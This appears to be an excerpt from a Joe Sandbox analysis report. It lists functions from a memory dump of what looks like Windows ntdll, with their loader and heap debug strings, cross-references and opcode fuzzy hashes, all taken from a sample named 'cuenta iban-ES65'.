String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 0-3591852110
Opcode ID: 0b5b73ae1c5e77209be8a91171c2172bcf9c0521c2fe5453ed2bd8110ee997c2
Instruction ID: 6d9bc6bb85966ac6dae799e538fbba0a46b83c7fe6c1ba6a658059e485c7a6b5
Opcode Fuzzy Hash: 0b5b73ae1c5e77209be8a91171c2172bcf9c0521c2fe5453ed2bd8110ee997c2
Instruction Fuzzy Hash: 0312CCB4600745EFD7158F24C486BBAFBEAFF09364F608899E4958FA41D738E880DB51

Uniqueness

Uniqueness Score: -1.00%

Function 3774AC20 Relevance: 11.8, Strings: 9, Instructions: 509COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrutil.c, xrefs: 37797EC4
Status: 0x%08lx, xrefs: 377980DD, 377981B8
minkernel\ntdll\ldrfind.c, xrefs: 377980EE
LdrpFindLoadedDllInternal, xrefs: 377980E4
DLL search path passed in externally: %ws, xrefs: 37797EB3
DLL name: %wZ, xrefs: 37797E82
minkernel\ntdll\ldrapi.c, xrefs: 37797E93, 377981C9
LdrpInitializeDllPath, xrefs: 37797EBA
LdrGetDllHandleEx, xrefs: 37797E89, 377981BF

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
API String ID: 0-3197712848
Opcode ID: 460214154f18f08845bbb1979e466b8d1705889ec7b746608114a30a5b3f7be0
Instruction ID: 526623c75e3c16622a5b58b28506de30bf56d5db0ca39c4eed37863e650aa46f
Opcode Fuzzy Hash: 460214154f18f08845bbb1979e466b8d1705889ec7b746608114a30a5b3f7be0
Instruction Fuzzy Hash: 901213B16093518FE320CF24C486BAAB7E1BF85754F46096EF8849F290EB34D945CB93

Uniqueness

Uniqueness Score: -1.00%

Function 3775D6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3775D879

Part of subcall function 37734779: RtlDebugPrintTimes.NTDLL ref: 37734817

Strings

Process 0x%p (%wZ) exiting, xrefs: 3779F0D1
$, xrefs: 3775D820
LdrShutdownProcess, xrefs: 3779F0D8
minkernel\ntdll\ldrinit.c, xrefs: 3779F0E2
$, xrefs: 3775D78D

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1975516107
Opcode ID: 44263efcc988a75c9cd4c27f56d943a21613847a473796854cbbc383739b9111
Instruction ID: 5bdb14cc9e97a21f1a138ca32c6831d63f054e212427f7bf5980cd81500c4f0e
Opcode Fuzzy Hash: 44263efcc988a75c9cd4c27f56d943a21613847a473796854cbbc383739b9111
Instruction Fuzzy Hash: 9E51E175A44345DFEB04CFA4C48979DBBF2BF44724F648969D800BF281D778A986CB81

Uniqueness

Uniqueness Score: -1.00%

Function 3773AD00 Relevance: 10.6, Strings: 8, Instructions: 573COMMON

Download Yara Rule

Strings

LUp7, xrefs: 3773AD59
LdrpResSearchResourceMappedFile Enter, xrefs: 3773ADD8
J, xrefs: 3773ADCE
MUI, xrefs: 3773B330
LdrpResSearchResourceMappedFile Exit, xrefs: 3773ADEC
#, xrefs: 37793444
H, xrefs: 3773ADE2
LUp7, xrefs: 3773AD17

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: #$H$J$LUp7$LUp7$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
API String ID: 0-3709395481
Opcode ID: 668298e9d62de867a31f189f8f1d6744bbb647a57782af1178a5cf18d582b1b0
Instruction ID: 1458fb713ecf7a90fc3eefbfa8205d104493f8717a7680a92081525f6adcbb76
Opcode Fuzzy Hash: 668298e9d62de867a31f189f8f1d6744bbb647a57782af1178a5cf18d582b1b0
Instruction Fuzzy Hash: 7332A5759463698BFB21CB14CC88BEDB7B6AF45350F1045EAE448AF261DB359E81CF80

Uniqueness

Uniqueness Score: -1.00%

Function 377DF51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 377DF55F, 377DF5A4, 377DF5F0, 377DF655, 377DF6A3, 377DF6EA
Specified HeapBase (%p) invalid, Status = %lx, xrefs: 377DF664
Specified HeapBase (%p) != to BaseAddress (%p), xrefs: 377DF6B2
HEAP[%wZ]: , xrefs: 377DF552, 377DF597, 377DF5E3, 377DF648, 377DF696, 377DF6DD
Invalid CommitSize parameter - %Ix, xrefs: 377DF5B2
Invalid ReserveSize parameter - %Ix, xrefs: 377DF56B
Specified HeapBase (%p) is free or not writable, xrefs: 377DF6F8
May not specify Lock parameter with HEAP_NO_SERIALIZE, xrefs: 377DF5FB

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
API String ID: 0-2224505338
Opcode ID: 73c81b79e0a8eea966dbb5e20513aa34cb8ceb2f8d132dafd32f42e0ef99031b
Instruction ID: 4e4d85e86f6eacfad21bcb94370f3a19571b013cee1009724b18bfe5d5b6a4c6
Opcode Fuzzy Hash: 73c81b79e0a8eea966dbb5e20513aa34cb8ceb2f8d132dafd32f42e0ef99031b
Instruction Fuzzy Hash: EF511776611244EFD701CFA4C868F6A77E5EF046B4F208899F421AF621DB35EE41DE12

Uniqueness

Uniqueness Score: -1.00%

Function 37749DD0 Relevance: 9.2, Strings: 7, Instructions: 499COMMON

Download Yara Rule

Strings

!(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 37797516
@, xrefs: 37749E07
Status != STATUS_NOT_FOUND, xrefs: 377976A7
Internal error check failed, xrefs: 37797525, 377976B6
[%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 377974FB
minkernel\ntdll\sxsisol.cpp, xrefs: 37797520, 377976B1
sxsisol_SearchActCtxForDllName, xrefs: 377974EA

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
API String ID: 0-761764676
Opcode ID: 482760388bf4480dd6c2523a71b2d475c6768445c1487fc114b342f25e4f4786
Instruction ID: 2d7665cac3df4054531085552d976f8f2fcd90082dee191399c22880da923f28
Opcode Fuzzy Hash: 482760388bf4480dd6c2523a71b2d475c6768445c1487fc114b342f25e4f4786
Instruction Fuzzy Hash: 6E129E75A04224DBEB14CFA8C881BEDB7B1FF49354F1584AAE845EF250E734E841CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 377B8633 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 377B86E7
HandleTraces, xrefs: 377B890F
VerifierFlags, xrefs: 377B88D0
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 377B86BD
VerifierDebug, xrefs: 377B8925
VerifierDlls, xrefs: 377B893D
AVRF: -*- final list of providers -*- , xrefs: 377B880F

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: f0db145906060cb1a62599d74ee7072616fa94c2e79baf28c8a339843f253899
Instruction ID: 8363f5f4431a9b1afcfd78193192ad30384d9901bf00faabe7701a8c182c169f
Opcode Fuzzy Hash: f0db145906060cb1a62599d74ee7072616fa94c2e79baf28c8a339843f253899
Instruction Fuzzy Hash: 359146B1641311AFEB21CF64C884B2A7BD5FB44B64F4549A9F950AF290C738AC05EBD3

Uniqueness

Uniqueness Score: -1.00%

Function 3775237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3779A79F
DGp7, xrefs: 37752382
LdrpDynamicShimModule, xrefs: 3779A7A5
minkernel\ntdll\ldrinit.c, xrefs: 3779A7AF

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: DGp7$Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$minkernel\ntdll\ldrinit.c
API String ID: 0-2743637385
Opcode ID: b83d0b5056c2036b9cc4b15b40bf4307fd28e491dbb51d8e6fd564fb495d9a55
Instruction ID: 81272aee3d5115ddd873e44d334735136801a2c653f32293cc17259fd97936cb
Opcode Fuzzy Hash: b83d0b5056c2036b9cc4b15b40bf4307fd28e491dbb51d8e6fd564fb495d9a55
Instruction Fuzzy Hash: 71314AB5A42200EFE7109F18C8C6F9A7BB5FB85F61F154479E800BF640DB789842CB51

Uniqueness

Uniqueness Score: -1.00%

Function 3772F113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 3778DCF3, 3778DE37, 3778E015, 3778E12D
(LONG)FreeEntry->Size > 1, xrefs: 3778E020
((LONG)FreeEntry->Size > 1), xrefs: 3778DE42
(UCRBlock != NULL), xrefs: 3778DCFE
HEAP[%wZ]: , xrefs: 3778DCE6, 3778DE2A, 3778E008, 3778E120
(!TrailingUCR), xrefs: 3778E138

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: 486bec6f45198939a86df9e83836dc7905bd3a089acc039fb511dfd7407dda94
Instruction ID: 839e3665c3a6b2c9c707020fafe667fd86bc84c0dc09703d382645e2349e6121
Opcode Fuzzy Hash: 486bec6f45198939a86df9e83836dc7905bd3a089acc039fb511dfd7407dda94
Instruction Fuzzy Hash: CD42F075208381EFD304CF24C884B2ABBE6FF88654F54496EE4A59F252DB34E942DB52

Uniqueness

Uniqueness Score: -1.00%

Function 3775510F Relevance: 7.9, Strings: 6, Instructions: 434COMMON

Download Yara Rule

Strings

h.u7, xrefs: 37755410, 377553CF, 3779BA6D, 377552FD, 3779BA09, 37755224, 37755227, 37755300, 377553D2, 37755413, 3779BA0C, 3779BA70
Kernel-MUI-Language-Disallowed, xrefs: 37755272
Kernel-MUI-Language-SKU, xrefs: 3775534B
Kernel-MUI-Number-Allowed, xrefs: 37755167
WindowsExcludedProcs, xrefs: 3775514A
Kernel-MUI-Language-Allowed, xrefs: 3775519B

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h.u7
API String ID: 0-1826765146
Opcode ID: 026651d2102bd996861f3c8b70761bc11c2b2646d142afb4dc114b8ae3239ac7
Instruction ID: c333b2168891df7100a72cb3629ad7ccbdbfb573ca25c7035613b219e8396697
Opcode Fuzzy Hash: 026651d2102bd996861f3c8b70761bc11c2b2646d142afb4dc114b8ae3239ac7
Instruction Fuzzy Hash: 47F13FB5D01219EFDB01CF94C984EEEB7B9FF096A0F51446AE505AB210EB749E01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 3774B0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON

Download Yara Rule

Strings

API set, xrefs: 37798201, 37798206
LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 377982DD
minkernel\ntdll\ldrutil.c, xrefs: 3779821A, 377982EE
LdrpPreprocessDllName, xrefs: 37798210, 377982E4
DLL %wZ was redirected to %wZ by %s, xrefs: 37798209
SxS, xrefs: 377981FA

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: bf5f8a1474ce552465ccc46c6a44500c804835f8427ba62c32eb0663d67edba3
Instruction ID: c0da58b9c7b96188d7d6f41fcf5dafbbb8e28e8a7abcdb4cbd53fcc8bab388b9
Opcode Fuzzy Hash: bf5f8a1474ce552465ccc46c6a44500c804835f8427ba62c32eb0663d67edba3
Instruction Fuzzy Hash: E8C18A75A00355ABEF148B64CC98BBE77B2EF46710F508469E801EF2A0EB74EC54CB91

Uniqueness

Uniqueness Score: -1.00%

Function 3776631F Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 377A4009
_LdrpInitialize, xrefs: 377A3EEA, 377A3F4C, 377A4010, 377A406A
Process initialization failed with status 0x%08lx, xrefs: 377A3F45
Delaying execution failed with status 0x%08lx, xrefs: 377A4063
minkernel\ntdll\ldrinit.c, xrefs: 377A3EF4, 377A3F56, 377A401A, 377A4074
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 377A3EE3

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 1f3a436550c2eb1fe16345b9930e30b80dd743b4beb13069157beba6ccf8bee4
Instruction ID: dbd469d16c42e8e89868da98c8b155a65a77019a74c301023e66ed17194cbd65
Opcode Fuzzy Hash: 1f3a436550c2eb1fe16345b9930e30b80dd743b4beb13069157beba6ccf8bee4
Instruction Fuzzy Hash: 14912670A41355DFFB24CF14C84DB6A7BA1FB05B69F4046A9ED10AF380DB789842CB92

Uniqueness

Uniqueness Score: -1.00%

Function 3776C5C6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 3776C5E4
LdrpInitializeImportRedirection, xrefs: 377A7F82, 377A7FF6
minkernel\ntdll\ldrredirect.c, xrefs: 377A7F8C, 377A8000
Unable to build import redirection Table, Status = 0x%x, xrefs: 377A7FF0
minkernel\ntdll\ldrinit.c, xrefs: 3776C5E3
Loading import redirection DLL: '%wZ', xrefs: 377A7F7B

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: c33e5b96cd9a05b79074ff2810ae182cd0015db06ea0b8a1b4dd32ca74d6fa81
Instruction ID: 0dc9941271b302453018e0e204cc21063233bab358fb47efdf3cdc936af3f3d9
Opcode Fuzzy Hash: c33e5b96cd9a05b79074ff2810ae182cd0015db06ea0b8a1b4dd32ca74d6fa81
Instruction Fuzzy Hash: 5731C2B17043419FD214EF28DC59E2ABBD5EF85A24F044968F884AF391E724ED05CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 37762594 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 377A1FC9
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 377A1F8A
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 377A1F82
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 377A1FA9
RtlGetAssemblyStorageRoot, xrefs: 377A1F6A, 377A1FA4, 377A1FC4
SXS: %s() passed the empty activation context, xrefs: 377A1F6F

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: e0d061bdc330abb7e88f3bce64fbfaece1290f921b073e9fb1797405e6910553
Instruction ID: 3d15383e77075f053de44e24b32276524a38d483f6c485649aa0bca3b8003799
Opcode Fuzzy Hash: e0d061bdc330abb7e88f3bce64fbfaece1290f921b073e9fb1797405e6910553
Instruction Fuzzy Hash: 55312676A012157BFB508A958C49FAB76799B40698F0045A9FE017F345D734BE01CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 37740680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 37794ECA
HEAP[%wZ]: , xrefs: 37794EBB
(UCRBlock->Size >= *Size), xrefs: 37794ED7

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 9bb48ff567ad5c4c31d17ed390f91896362d8ee63eedb8cbac5c03a7284a99c1
Instruction ID: d1128f8888235dd74e07495df1362c92babea09f187f3713c9a33072f576c40c
Opcode Fuzzy Hash: 9bb48ff567ad5c4c31d17ed390f91896362d8ee63eedb8cbac5c03a7284a99c1
Instruction Fuzzy Hash: D1F1DC74A0160ADFEB05CF28C984BAAB7F6FF45350F1485A8E4059F381EB34E981CB91

Uniqueness

Uniqueness Score: -1.00%

Function 37759723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 37759922

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 3779DAFF
LdrpUnloadNode, xrefs: 3779DAF5
Unmapping DLL "%wZ", xrefs: 3779DAEE

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-2283098728
Opcode ID: c877f2303f37bf51db3289e112c5bacf3a7bbe544bda0b8c7ea8e6b292e5f4ca
Instruction ID: 07ff22c3cad7c1d4af92eff6765ec3918b9e001d231e9dd57e99f83465e2f06f
Opcode Fuzzy Hash: c877f2303f37bf51db3289e112c5bacf3a7bbe544bda0b8c7ea8e6b292e5f4ca
Instruction Fuzzy Hash: 1B51EFB17003019FE710DF38C888B2977A6BB89734F140A6EE4559F691EB38A845CF92

Uniqueness

Uniqueness Score: -1.00%

Function 3776C640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3776C6DF

Strings

LdrpInitializePerUserWindowsDirectory, xrefs: 377A80E9
Failed to reallocate the system dirs string !, xrefs: 377A80E2
minkernel\ntdll\ldrinit.c, xrefs: 377A80F3

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1783798831
Opcode ID: cb1905474b44cef4590fe8f7c820d9ad3aaab83a5797f804eef271839a05417f
Instruction ID: e9fa48c97be3b1c23df4aa2a0537e0eff2bb4082d930b5d434e8273717f481d1
Opcode Fuzzy Hash: cb1905474b44cef4590fe8f7c820d9ad3aaab83a5797f804eef271839a05417f
Instruction Fuzzy Hash: 8241E8B5644300ABD711DF64CC49B5B7BE9FF44B65F008D2AF858AB250EB38E801CB96

Uniqueness

Uniqueness Score: -1.00%

Function 377B43D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 377B4489

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 377B4508
minkernel\ntdll\ldrredirect.c, xrefs: 377B4519
LdrpCheckRedirection, xrefs: 377B450F

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 3446177414-3154609507
Opcode ID: 19fcb672c4fc319e30329b9e845b622011b38f3233db8bff89bd4f48044b4e99
Instruction ID: da47f2a0b094267027e6228958405833c7e73fde6e94a2943030373d6c4e8317
Opcode Fuzzy Hash: 19fcb672c4fc319e30329b9e845b622011b38f3233db8bff89bd4f48044b4e99
Instruction Fuzzy Hash: 5E419E766047219FDF30CF58D940A1677E6BF48AA0F054AA9EC98EF252D730E821CB91

Uniqueness

Uniqueness Score: -1.00%

Function 377B4BC0 Relevance: 6.5, Strings: 5, Instructions: 246COMMON

Download Yara Rule

Strings

\microsoft.system.package.metadata\Application, xrefs: 377B4DD8
.Local, xrefs: 377B4DF0
.DLL, xrefs: 377B4D47, 377B4E1C
\, xrefs: 377B4BE6
/, xrefs: 377B4BED

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

